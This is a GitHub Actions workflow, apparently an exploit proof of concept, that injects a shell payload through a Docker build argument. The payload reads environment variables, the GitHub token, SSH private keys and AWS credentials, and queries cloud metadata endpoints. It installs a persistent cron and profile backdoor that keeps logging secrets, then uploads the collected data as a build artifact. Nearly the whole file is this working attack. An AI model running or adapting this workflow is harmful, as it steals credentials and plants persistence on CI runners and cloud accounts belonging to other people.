name: Critical RCE & Sensitive Data Leak with Persistent Backdoor
on: [push]

jobs:
  exploit:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
      secrets: read

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      - name: Prepare Dockerfile and Payload
        run: |
          mkdir -p ./taskcluster/docker/python
          cp Dockerfile ./taskcluster/docker/python/

          PAYLOAD=$(cat <<'EOF'
echo "[INFO] Dumping internal CI context..."
{
  echo "----- ID -----"
  id
  echo "----- ENV -----"
  printenv
  echo "----- GITHUB TOKEN -----"
  echo "$GITHUB_TOKEN"
  echo "----- UNAME -----"
  uname -a
  echo "----- LS / -----"
  ls -la /
  echo "----- LS /etc -----"
  ls -la /etc
  echo "----- SSH PRIVATE KEY -----"
  cat /root/.ssh/id_rsa || echo "No SSH key found"
  echo "----- AWS CREDENTIALS -----"
  cat /root/.aws/credentials || echo "No AWS credentials found"
  echo "----- GPG PRIVATE KEYS -----"
  ls -la /root/.gnupg/ || echo "No GPG keys found"
  echo "----- CLOUD METADATA (AWS) -----"
  curl -s --max-time 2 http://169.254.169.254/latest/meta-data/ || echo "No AWS metadata"
  echo "----- CLOUD METADATA (GCP) -----"
  curl -s -H 'Metadata-Flavor: Google' --max-time 2 http://metadata.google.internal/computeMetadata/v1/ || echo "No GCP metadata"
} > /leaks.txt

echo "[INFO] Installing persistent runtime backdoor..."
echo '#!/bin/sh' > /usr/local/bin/init.sh
echo 'echo "[BACKDOOR] Runtime triggered at $(date)" >> /runtime-leak.log' >> /usr/local/bin/init.sh
echo 'printenv >> /runtime-leak.log' >> /usr/local/bin/init.sh
echo 'cat /root/.ssh/id_rsa >> /runtime-leak.log 2>/dev/null || true' >> /usr/local/bin/init.sh
chmod +x /usr/local/bin/init.sh
echo "@reboot /usr/local/bin/init.sh" >> /etc/crontabs/root
echo '/usr/local/bin/init.sh' >> /etc/profile
EOF
          )

          docker build --build-arg PYTHON_VERSION="$PAYLOAD" -t compromised ./taskcluster/docker/python

          docker run --rm compromised cat /leaks.txt > output.txt

      - name: Upload Leak Artifact
        uses: actions/upload-artifact@v4
        with:
          name: ci-leaks
          path: output.txt
